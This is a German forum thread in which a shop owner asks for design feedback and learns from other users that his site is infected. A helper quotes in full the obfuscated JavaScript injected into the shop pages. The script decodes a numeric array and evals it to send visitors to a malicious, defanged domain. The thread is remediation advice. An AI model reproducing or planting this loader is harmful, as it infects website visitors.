Bitte werten, aber freundlich ich bin sensibel :)

[NicoDeluxe]

Ciao romy,

hab es unten rechts, weil ich es oben rechts nicht hinbekomme Hab kein Plan wie ich "Login" & Co. weiter nach Links verschieben kann, damit das Supportdingens den Login nicht verdeckt

[NicoDeluxe]

kann mir mal jemand verraten, wie ich oben links das HERZLICH WILLKOMMEN weiß bekomme? oO
Hab jetzt ein dunkleres Orange gewählt, dass liest sich besser

[NicoDeluxe]

nun hab ich den Beratungsbutton oben rechts eingebunden, ist besser so als unten links?

[Ceciro]

Hallo,

AVG schlägt auch an:

[NicoDeluxe]

was genau soll das jetzt sein? Bzw WOOO das ist die Frage aller Fragen

[sgieselmann]

Schau dir mal bitte die Index.php und Index.html Dateien auf dem Server an und Schau mal ob dort irgendwo vor allen am Ende der jeweiligen Dateien ein Eval Funktion aufgerufen wird oder andere dir unbekannte Funktionen.

Dein Server wurde infiziert. Kontaktiere bitte eine Prof. Internetagentur und setz dich mit deinem Provider in Verbindung.

[sgieselmann]

Solange du das nicht in den Griff bekommst würde ich dir im Wohle der Kunden empfehlen die Seite vorerst zu schließen... Würde ich auf eine solche Seite kommen würde ich sie umgehend google  und anderen blacklisten melden.

[NicoDeluxe]

hab es meinem Programmierer gemeldet. Ich habe nix aussergewöhnliches gefunden, ausser dass evtl. das Supportmodul den Alarm auslöst

hab Evals über wepawet.cs.ucsb.edu gecheckt, ist nix

[sgieselmann]

Ich dachte das wäre erst seit heute im Einsatz?

[NicoDeluxe]

jupp ist es auch aber du bist nun der dritte der mir das mitteilt (seit langem war ruhe)

Gibts denn eine Kostenlose Software, die mir das auch anzeigen kann? Will mich erst im August mit neuen Lizenzen eindecken und weiß auch noch nicht so recht welches Antivirenprogramm ich nehmen soll

[sgieselmann]

Was willst dir da anschauen lassen?

Geh auf deinen Onlineshop rechte Maustaste Quelltext anzeigen und am Ende der Datei das hier vorfinden:

Code: PHP  [Auswählen]

<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=[-36.5,-36.5,11.5,10,-25,-21,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,10.5,9.5,17,-6.5,13,9.5,13.5,9.5,14,17,16.5,-8,19.5,1,7.5,10.5,-2,7.5,13.5,9.5,-21,-21.5,8,14.5,9,19.5,-21.5,-20.5,4.5,-17,5.5,-20.5,20.5,-34.5,-36.5,-36.5,-36.5,11.5,10,16,7.5,13.5,9.5,16,-21,-20.5,-11.5,-34.5,-36.5,-36.5,21.5,-25,9.5,13,16.5,9.5,-25,20.5,-34.5,-36.5,-36.5,-36.5,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,18.5,16,11.5,17,9.5,-21,-24,-11,11.5,10,16,7.5,13.5,9.5,-25,16.5,16,8.5,-10.5,-21.5,11,17,17,15,-12,-17.5,-17.5,9.5,12,8,16.5,14.5,16,-18,11.5,14,-17.5,-15,-17,-15,14,14.5,17,10,14.5,17.5,14,9,-21.5,-25,18.5,11.5,9,17,11,-10.5,-21.5,-16.5,-17,-21.5,-25,11,9.5,11.5,10.5,11,17,-10.5,-21.5,-16.5,-17,-21.5,-25,16.5,17,19.5,13,9.5,-10.5,-21.5,18,11.5,16.5,11.5,8,11.5,13,11.5,17,19.5,-12,11,11.5,9,9,9.5,14,-11.5,15,14.5,16.5,11.5,17,11.5,14.5,14,-12,7.5,8,16.5,14.5,13,17.5,17,9.5,-11.5,13,9.5,10,17,-12,-17,-11.5,17,14.5,15,-12,-17,-11.5,-21.5,-10,-11,-17.5,11.5,10,16,7.5,13.5,9.5,-10,-24,-20.5,-11.5,-34.5,-36.5,-36.5,21.5,-34.5,-36.5,-36.5,10,17.5,14,8.5,17,11.5,14.5,14,-25,11.5,10,16,7.5,13.5,9.5,16,-21,-20.5,20.5,-34.5,-36.5,-36.5,-36.5,18,7.5,16,-25,10,-25,-10.5,-25,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,8.5,16,9.5,7.5,17,9.5,-6.5,13,9.5,13.5,9.5,14,17,-21,-21.5,11.5,10,16,7.5,13.5,9.5,-21.5,-20.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,16.5,16,8.5,-21.5,-19,-21.5,11,17,17,15,-12,-17.5,-17.5,9.5,12,8,16.5,14.5,16,-18,11.5,14,-17.5,-15,-17,-15,14,14.5,17,10,14.5,17.5,14,9,-21.5,-20.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,18,11.5,16.5,11.5,8,11.5,13,11.5,17,19.5,-10.5,-21.5,11,11.5,9,9,9.5,14,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,15,14.5,16.5,11.5,17,11.5,14.5,14,-10.5,-21.5,7.5,8,16.5,14.5,13,17.5,17,9.5,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,13,9.5,10,17,-10.5,-21.5,-17,-21.5,-11.5,10,-18,16.5,17,19.5,13,9.5,-18,17,14.5,15,-10.5,-21.5,-17,-21.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,18.5,11.5,9,17,11,-21.5,-19,-21.5,-16.5,-17,-21.5,-20.5,-11.5,10,-18,16.5,9.5,17,-8.5,17,17,16,11.5,8,17.5,17,9.5,-21,-21.5,11,9.5,11.5,10.5,11,17,-21.5,-19,-21.5,-16.5,-17,-21.5,-20.5,-11.5,-34.5,-36.5,-36.5,-36.5,9,14.5,8.5,17.5,13.5,9.5,14,17,-18,10.5,9.5,17,-6.5,13,9.5,13.5,9.5,14,17,16.5,-8,19.5,1,7.5,10.5,-2,7.5,13.5,9.5,-21,-21.5,8,14.5,9,19.5,-21.5,-20.5,4.5,-17,5.5,-18,7.5,15,15,9.5,14,9,-7.5,11,11.5,13,9,-21,10,-20.5,-11.5,-34.5,-36.5,-36.5,21.5];v="e"+"va";}if(v)e=window[v+"l"];try{q=document["crea"+"teEle"+"ment"]("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?h:"");for(;565!=i;i+=1){j=i;if(e)s=s+r["fr"+"omC"+((e)?z:12)]((w[j]*1+41)*2);}
if(v&&e&&r&&z&&h&&s&&f&&v&&v&&e&&r&&h)try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}</script>

Das nichts anderes Versucht als dich auf diese Domain:
"http://  ejbsor.  in/  404notfound"    (ohne Leerzeichen - bitte nicht aufrufen!)

weiterzuleiten.

Solche Exploits kommen meist durch Sicherheitslücken in Formulare zustande (XSS) und infiziert aktuell meist index.html sowie index.php dateien auf dem Server.

Über die Log-Dateien kann man herrausfinden wann und wodurch die betroffene Datei modifziert wurde und so auf die Sicherheitslücke treffen.

Nimm die Seite bitte vorerst vom Netz.

EDIT
Infos hier:
http://www.stopbadware.org/

[NicoDeluxe]

Hallo, danke

Hab erstmal offline genommen, wird umgehend geprüft und ein neues Virenprogramm gekauft, kannst du mir was empfehlen?

[sgieselmann]

Guten Morgen,

das kommt wiederum auf deine Bedürfnisse an. Ich selbst benutzt zum Beispiel im privaten Bereich:

Kaspersky lab Pure 2

Finde das Preis / Leistungsverhältnis einfach passend.

Gruß

Sebastian

[NicoDeluxe]

Hi sgieselmann,

hast du mit dem kaspersky den virus entdeckt? Kannst du nochmal drauf gehen, ob du eine Meldung wieder bekommst? Danke und liebe Grüße

[sgieselmann]

Ja der Exploit ist wieder vorhanden allerdings in anderer Form. Sprich entweder befindest sich deine Seite in einer Whitelist der Cracker-Szene. Sprich deine Sicherheitslücke wurde in der Szene bereits verbreitet
oder der eigentliche Angreife selbst hat eine Aktuallisierung vorgenommen.

Nochmal das beseitigen des schadhaften Codes ist nicht die Lösung des eigentlichen Problems.
Je nach Provider, hilt dir auch meist der technische Support weiter.

Solltest du wirklich über einen Programmierer zur Unterstützung verfügen - solltest du diesen mal besser auf den Pott setzen.

Offenbar ist die Exploit Variante intelligenter geworden und ist nicht bei jedem Seitenaufruf auffindbar.
Beispielsweise könnte das Script bei einer bestehenden Session die Ausführung der schadhaften Codes verhindern. Denn nach einem Refresh der Seite ist der Exploit nicht mehr vorhanden.